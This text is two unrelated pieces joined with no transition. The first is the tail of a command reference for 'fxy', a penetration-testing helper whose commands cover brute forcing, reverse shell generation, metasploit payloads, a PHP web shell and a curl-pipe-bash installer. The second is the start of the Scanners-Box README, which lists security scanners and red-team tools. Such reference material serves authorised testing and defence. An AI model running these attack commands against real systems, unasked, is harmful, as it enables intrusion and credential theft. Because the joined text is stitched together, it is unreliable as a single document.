fxy dirb [s(sl)|tls] [subdir] : dirb PROTO://RHOST+SUBDIR | tee
fxy (evil-)winrm [cid] : evil-winrm -i RHOST -u :cid_user -p :cid_pass
fxy fix [deps|pip(3)|py(thon)(3)|sys(tem)] : Fix stufff
fxy h(ash)c(rack) [type] [hash|cid] : Crack hash
fxy h(ash)i(d) [hash|cid] : Identify hash type
fxy h(ash)s(earch) [help|any|md5|sha1|...] [hash|cid] : Search for hashes
fxy h(elp) [search keyword] : Show help or search for keyword
fxy httpd|ws [port] : Spawn python3 http webserver
fxy httpsd|wss [port] : Spawn openssl https webserver
fxy hydra|brute [help|service] [port] [username] : hydra brute force (ssh, ftp, smb, http)
fxy (i)conv|convert [file] : iconv -f UTF-16LE -t UTF-8 FILE -o FILE.conv
fxy ip(s) : Show local and external IP(s)
fxy ipwsh [port] : Download InsecurePowerShell and serve via davserver
fxy len(gth) [input] : Show length of input
fxy l(isten) [port] : ncat -vlkp PORT
fxy md5|sha(1)|sha2(56)|sha3(84)|sha5(12) [input] : Generate hashes from input
fxy msf [payload] [port] [gen(erate)] [format] : metasploit setup listener / generate payload
fxy msf ssh(enum) [port] [wordlist] : metasploit ssh user enumeration
fxy msf web(del)(ivery) [lport] [py|php|psh] : metasploit web delivery module
fxy nfs|showmount : showmount -e RHOST
fxy nikto [s(sl)|tls] [subdir] : nikto -host PROTO://RHOST+SUBDIR | tee
fxy n(map) [full] : nmap -v -A (-p-) RHOST | tee
fxy pass(word) : Show default machine password
fxy peas [version] [port] : Download *peas and serve via http.server
fxy p(ing) [count] : ping -c COUNT RHOST
fxy rev(shell) [help|type] [port] : Reverse shell generator (bash, php, python, perl, ...)
fxy r(host) [target] : Show/Set RHOST
fxy rpc(client) [cid] [domain] [cmd] : rpcclient
fxy smbpasswd [cid] : smbpasswd -r RHOST -U :cid_user
fxy socat [port] : socat based listener
fxy ssh [cid] [port] : sshpass -e ssh :cid_user@RHOST -p PORT
fxy up(date) : Update fxy
fxy u(ser)a(gent) [text] : Show/Set User-Agent
fxy weevely [help|gen] : weevely php shell
fxy wfuzz [help|s(sl)|tls] [subdir] [hw] [hc] : wfuzz files/folders
fxy wfuzz vhost [s(sl)|tls] [domain] [hw] [hc] : wfuzz vhost
```
## Easy to Install
```
curl https://raw.githubusercontent.com/doomguy/fxy/master/install.sh | bash
```
## fxy is Fun
```
$ fxy rhost webscantest.com
$ fxy r
RHOST: webscantest.com
$ fxy nmap
> nmap -v -A webscantest.com -oA webscantest.com_nmap_2020-08-20_221653
[?] Run command? (y/N):
$ fxy nikto
> nikto -host http://webscantest.com/ | tee webscantest.com_nikto_2020-08-20_221718.log
[?] Run command? (y/N):
$ fxy md5 pass123
32250170a0dca92d53ec9624f336ca24
$ fxy b64 fxy.rocks
Znh5LnJvY2tz
$ fxy ciphey Znh5IHJvY2tz
> ciphey -t 'Znh5IHJvY2tz'
[?] Run command? (y/N): y
Format used:
base64
utf8
Final result: "fxy rocks"
$ fxy hs sha256 a32b722e08c256c1e701c2fc63f88064e9d76e9b01ade5f87fd2f2a6fe42b1a6
[*] (hashtoolkit.com) Match found: 's3cure'
```
|
English | [简体中文](./README_CN.md)
<p align="center">
<img src="./logo.png" width="300px">
</p>
<p align="center">
<img src="https://img.shields.io/badge/version-2023.08-blue.svg" alt="202301">
<img src="http://img.shields.io/badge/license-CC--BY--NC--ND--4.0-blue.svg?style=flat" alt="license">
<img src="https://img.shields.io/badge/Scanners/Number-327-blue.svg" alt="number">
<a href="https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2FWe5ter%2FScanners-Box"><img alt="Twitter URL" src="https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2FWe5ter%2FScanners-Box"></a>
</p>
<br/>
## Donate with PayPal
<a href="https://www.paypal.com/paypalme/zhiyangzeng" target="_blank"><img src="badges/blue.svg" width="240"></a>
## Sponsors
<div class="sponsor">
<img class="avatar avatar-user" src="https://cdn-icons-png.flaticon.com/128/6997/6997649.png" width="50" height="50">
<b>Albert</b>
</div>
## Introduction
**Scanners Box** also known as **scanbox**, is a powerful **hacker toolkit**, which has collected more than 10 categories of open source scanners from Github, including subdomain, database, middleware and other modular design scanner etc. **But for other Well-known scanning tools, such as nmap, w3af, brakeman, arachni, nikto, metasploit, aircrack-ng will not be included in the scope of collection.**
## Contents
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Large Language Model Security](#large-language-model-security)
- [Smart Contracts Security](#smart-contracts-security)
- [Red Team vs Blue Team](#red-team-vs-blue-team)
- [Mobile App Packages Analysis](#mobile-apps-packages-analysis)
- [Binary Executables Analysis](#binary-executables-analysis)
- [Privacy Compliance](#privacy-compliance)
- [Subdomain Enumeration or Takeover](#subdomain-enumeration-or-takeover)
- [Database SQL Injection Vulnerability or Brute Force](#database-sql-injection-vulnerability-or-brute-force)
- [Weak Usernames or Passwords Enumeration For Web](#weak-usernames-or-passwords-enumeration-for-web)
- [Authorization Brute Force or Vulnerability Scan For IoT](#authorization-brute-force-or-vulnerability-scan-for-iot)
- [Mutiple types of Cross-site scripting Detection](#mutiple-types-of-cross-site-scripting-detection)
- [Enterprise sensitive information Leak Scan](#enterprise-sensitive-information-leak-scan)
- [Malicious Scripts Detection](#malicious-scripts-detection)
- [Vulnerability Assessment for Middleware](#vulnerability-assessment-for-middleware)
- [Special Targets Scan](#special-targets-scan)
- [Dynamic or Static Code Analysis](#dynamic-or-static-code-analysis)
- [Modular Design Scanners or Vulnerability Detecting Framework](#modular-design-scanners-or-vulnerability-detecting-framework)
- [Advanced Persistent Threat Detect](#advanced-persistent-threat-detect)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
***
### Large Language Model Security
- https://github.com/leondz/garak - **LLM vulnerability scanner for hallucination, data leakage, promp injection, misinformation, toxicity generation, jailbreaks, and many other weaknesses**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/leondz/garak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/leondz/garak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/leondz/garak.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/leondz/garak?style=flat-square)
- https://github.com/protectai/rebuff - **Designed to protect AI applications from prompt injection (PI) attacks**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/protectai/rebuff?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/protectai/rebuff?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/protectai/rebuff.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/protectai/rebuff?style=flat-square)
- https://github.com/mnns/LLMFuzzer - **Fuzzing Framework for Large Language Models**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mnns/LLMFuzzer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mnns/LLMFuzzer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mnns/LLMFuzzer.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/mnns/LLMFuzzer?style=flat-square)
### Smart Contracts Security
- https://github.com/ConsenSys/mythril - **Security analysis tool for EVM bytecode. Supports smart contracts built for Ethereum, Hedera etc.**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ConsenSys/mythril?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ConsenSys/mythril?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ConsenSys/mythril.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/ConsenSys/mythril?style=flat-square)
- https://github.com/enzymefinance/oyente - **An Analysis Tool for Smart Contracts**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/enzymefinance/oyente?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/enzymefinance/oyente?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/enzymefinance/oyente.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/enzymefinance/oyente?style=flat-square)
- https://github.com/eth-sri/securify2 - **Official security scanner for Ethereum smart contracts supported by the Ethereum Foundation**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eth-sri/securify2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eth-sri/securify2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eth-sri/securify2.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/eth-sri/securify2?style=flat-square)
- https://github.com/smartdec/smartcheck - **Static analysis tool that detects vulnerabilities and bugs in Solidity programs**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java--or--Node-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/smartdec/smartcheck?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/smartdec/smartcheck?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/smartdec/smartcheck.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/smartdec/smartcheck?style=flat-square)
- https://github.com/ivicanikolicsg/MAIAN - **Automatic tool for finding trace vulnerabilities in Ethereum smart contracts**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ivicanikolicsg/MAIAN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ivicanikolicsg/MAIAN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ivicanikolicsg/MAIAN.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/ivicanikolicsg/MAIAN?style=flat-square)
### Red Team vs Blue Team
#### Supply Chain Analysis(SCA)
- https://github.com/murphysecurity/murphysec - **Open source tool for software supply chain security**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/murphysecurity/murphysec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/murphysecurity/murphysec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/murphysecurity/murphysec.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/murphysecurity/murphysec?style=flat-square)
#### Container and Cluster
- https://github.com/cdk-team/CDK - **A tool to gather information inside container/cluster and exploit them**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cdk-team/CDK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cdk-team/CDK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/cdk-team/CDK?style=flat-square)
- https://github.com/cr0hn/dockerscan - **Docker security analysis & hacking tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cr0hn/dockerscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cr0hn/dockerscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cr0hn/dockerscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/cr0hn/dockerscan?style=flat-square)
- https://github.com/armosec/kubescape - **The first tool for testing if Kubernetes is deployed securely as defined in Kubernetes Hardening Guidance by to NSA and CISA**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/armosec/kubescape?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/armosec/kubescape?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/armosec/kubescape?style=flat-square) ![GitHub](https://img.shields.io/github/license/armosec/kubescape?style=flat-square)
- https://github.com/chaitin/veinmind-tools - **Container security scanner for backdoor, malicious, weak pass and sensitive and the like.**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go/Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chaitin/veinmind-tools?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chaitin/veinmind-tools?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools?style=flat-square) ![GitHub](https://img.shields.io/github/license/chaitin/veinmind-tools?style=flat-square)
- https://github.com/deepfence/ThreatMapper - **Scan for in-production vulnerabilities and exposed secrets, and identify attack paths to reach them remotely**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deepfence/ThreatMapper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deepfence/ThreatMapper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deepfence/ThreatMapper?style=flat-square) ![GitHub](https://img.shields.io/github/license/deepfence/ThreatMapper?style=flat-square)
- https://github.com/deepfence/SecretScanner - **Scan containers and host filesystems for unprotected keys, API tokens and passwords**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deepfence/SecretScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deepfence/SecretScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deepfence/SecretScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/deepfence/SecretScanner?style=flat-square)
- https://github.com/cyberark/KubiScan - **A tool to scan Kubernetes cluster for risky permissions**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cyberark/KubiScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cyberark/KubiScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cyberark/KubiScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/cyberark/KubiScan?style=flat-square)
- https://github.com/kvesta/vesta - **A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kvesta/vesta?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kvesta/vesta?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kvesta/vesta?style=flat-square) ![GitHub](https://img.shields.io/github/license/kvesta/vesta?style=flat-square)
#### Services fingerprint detection
- https://github.com/EdgeSecurityTeam/EHole - **Core system fingerprint detection tool for Red team**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/EdgeSecurityTeam/EHole?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/EdgeSecurityTeam/EHole?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/EdgeSecurityTeam/EHole.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/EdgeSecurityTeam/EHole?style=flat-square)
#### Man-In-The-Middle
- https://github.com/niloofarkheirkhah/nili - **Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/niloofarkheirkhah/nili?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/niloofarkheirkhah/nili?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/niloofarkheirkhah/nili.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/niloofarkheirkhah/nili?style=flat-square)
#### The framework
- https://github.com/m4n3dw0lf/PytheM - **Multi-purpose network pentest framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4n3dw0lf/PytheM?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4n3dw0lf/PytheM?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4n3dw0lf/PytheM?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4n3dw0lf/PytheM?style=flat-square)
- https://github.com/FunnyWolf/Viper - **Graphical, Modularization and weaponization intranet penetration tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FunnyWolf/Viper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FunnyWolf/Viper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper?style=flat-square) ![GitHub](https://img.shields.io/github/license/FunnyWolf/Viper?style=flat-square)
- https://github.com/P1-Team/AlliN - **Mostly used for asset collection before penetration and lateral movement of intranet**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/P1-Team/AlliN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/P1-Team/AlliN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/P1-Team/AlliN?style=flat-square) ![GitHub](https://img.shields.io/github/license/P1-Team/AlliN?style=flat-square)
- https://github.com/k8gege/LadonGo - **Pentest framework for Windows/Linux/Mac intranet networks**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/k8gege/LadonGo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/k8gege/LadonGo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/k8gege/LadonGo?style=flat-square) ![GitHub](https://img.shields.io/github/license/k8gege/LadonGo?style=flat-square)
- https://github.com/shmilylty/netspy - **Quickly scan the reachable network segmentation of the intranet**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shmilylty/netspy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shmilylty/netspy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shmilylty/netspy?style=flat-square) ![GitHub](https://img.shields.io/github/license/shmilylty/netspy?style=flat-square)
- https://github.com/byt3bl33d3r/CrackMapExec - **Swiss army knife for pentesting Windows/Active Directory environments**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub](https://img.shields.io/github/license/byt3bl33d3r/CrackMapExec?style=flat-square)
- https://github.com/u21h2/nacs - **Event-driven intranet pentest scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/u21h2/nacs?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/u21h2/nacs?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/u21h2/nacs?style=flat-square) ![GitHub](https://img.shields.io/github/license/u21h2/nacs?style=flat-square)
- https://github.com/h4wkst3r/SCMKit - **Source Code Management Attack Toolkit,such as GitHub Enterprise, GitLab Enterprise and Bitbucket Server**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-CSharp-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/h4wkst3r/SCMKit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/h4wkst3r/SCMKit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/h4wkst3r/SCMKit?style=flat-square) ![GitHub](https://img.shields.io/github/license/h4wkst3r/SCMKit?style=flat-square)
- https://github.com/lijiejie/MisConfig_HTTP_Proxy_Scanner - **Helps to scan misconfigured reverse proxy servers and misconfigured forward proxy servers**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square)
- https://github.com/chainreactors/gogo - **A highly controllable and scalable automation engine for red teams**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chainreactors/gogo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chainreactors/gogo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chainreactors/gogo?style=flat-square) ![GitHub](https://img.shields.io/github/license/chainreactors/gogo?style=flat-square)
#### Wireless Pentest
- https://github.com/savio-code/fern-wifi-cracker - **Testing and discovering flaws in ones own network**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub](https://img.shields.io/github/license/savio-code/fern-wifi-cracker?style=flat-square)
- https://github.com/P0cL4bs/WiFi-Pumpkin - **Framework for Rogue Wi-Fi Access Point Attack**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub](https://img.shields.io/github/license/P0cL4bs/WiFi-Pumpkin?style=flat-square)
- https://github.com/MisterBianco/BoopSuite - **A Suite of Tools written in Python for wireless auditing and security testing**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MisterBianco/BoopSuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MisterBianco/BoopSuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MisterBianco/BoopSuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/MisterBianco/BoopSuite?style=flat-square)
- https://github.com/besimaltnok/PiFinger - **Searches for wifi-pineapple traces and calculate wireless network security score**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/besimaltnok/PiFinger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/besimaltnok/PiFinger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/besimaltnok/PiFinger?style=flat-square) ![GitHub](https://img.shields.io/github/license/besimaltnok/PiFinger?style=flat-square)
- https://github.com/derv82/wifite2 - **A complete re-write of Wifite,Automated Wireless Attack Tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/derv82/wifite2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/derv82/wifite2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/derv82/wifite2?style=flat-square) ![GitHub](https://img.shields.io/github/license/derv82/wifite2?style=flat-square)
- https://github.com/D3Ext/WEF - **Wi-Fi Exploitation Framework for 2.4 and 5 Ghz both attacks**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Bash-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D3Ext/WEF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D3Ext/WEF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D3Ext/WEF?style=flat-square) ![GitHub](https://img.shields.io/github/license/D3Ext/WEF?style=flat-square)
- https://github.com/pinecone-wifi/pinecone - **A WLAN red team framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pinecone-wifi/pinecone?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pinecone-wifi/pinecone?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pinecone-wifi/pinecone?style=flat-square) ![GitHub](https://img.shields.io/github/license/pinecone-wifi/pinecone?style=flat-square)
### Mobile Apps Packages Analysis
- https://github.com/dwisiswant0/apkleaks - **Scanning APK file for URIs, endpoints & secrets**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dwisiswant0/apkleaks?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dwisiswant0/apkleaks?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dwisiswant0/apkleaks?style=flat-square) ![GitHub](https://img.shields.io/github/license/dwisiswant0/apkleaks?style=flat-square)
- https://github.com/kelvinBen/AppInfoScanner - **Collecting information from APK file, support self-defined rules**
